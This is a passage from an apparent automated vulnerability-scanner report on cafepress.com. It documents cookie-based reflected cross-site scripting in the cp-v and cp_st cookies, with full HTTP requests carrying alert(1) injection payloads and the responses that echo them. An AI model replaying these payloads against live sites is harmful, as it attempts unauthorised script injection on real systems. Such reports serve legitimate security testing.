Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAe199a"-alert(1)-"33c6f5a13e; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW17
Cteonnt-Length: 51172
Date: Sun, 26 Dec 2010 13:46:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cart_item_count=0; domain=cafepress.com; expires=Sat, 26-Mar-2011 12:46:51 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Content-Length: 51172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAe199a"-alert(1)-"33c6f5a13e";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.95. http://www.cafepress.com/cp/viewcart.aspx [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/viewcart.aspx

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 197e0</script><script>alert(1)</script>ccc939a9ef5 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cp/viewcart.aspx?s=search HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=197e0</script><script>alert(1)</script>ccc939a9ef5; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 51195
Date: Sun, 26 Dec 2010 13:46:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cart_item_count=0; domain=cafepress.com; expires=Sat, 26-Mar-2011 12:46:48 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Content-Length: 51195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
afepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = '/cp/viewcart.aspx'
window.cafepress.tealeaf.searchTerm = '197e0</script><script>alert(1)</script>ccc939a9ef5'
window.cafepress.tealeaf.salesChannel = 'Other'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0
...[SNIP]...

1.96. http://www.cafepress.com/make/birth-announcements [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/birth-announcements

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1c6c"-alert(1)-"3104c288fc9 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/birth-announcements HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAc1c6c"-alert(1)-"3104c288fc9; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 54488
Date: Sun, 26 Dec 2010 13:48:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAc1c6c"-alert(1)-"3104c288fc9";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.97. http://www.cafepress.com/make/birth-announcements [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/birth-announcements

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b100</script><script>alert(1)</script>01efe3e9555 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/birth-announcements HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=7b100</script><script>alert(1)</script>01efe3e9555; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 54510
Date: Sun, 26 Dec 2010 13:48:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '7b100</script><script>alert(1)</script>01efe3e9555'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP
...[SNIP]...

1.98. http://www.cafepress.com/make/custom-baby-gear [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-baby-gear

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 505c2"-alert(1)-"362de5625b3 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/custom-baby-gear HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA505c2"-alert(1)-"362de5625b3; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 71179
Date: Sun, 26 Dec 2010 13:48:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 71179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA505c2"-alert(1)-"362de5625b3";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.99. http://www.cafepress.com/make/custom-baby-gear [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-baby-gear

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8caa8</script><script>alert(1)</script>49b69bc8c1b was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/custom-baby-gear HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=8caa8</script><script>alert(1)</script>49b69bc8c1b; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 71207
Date: Sun, 26 Dec 2010 13:48:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
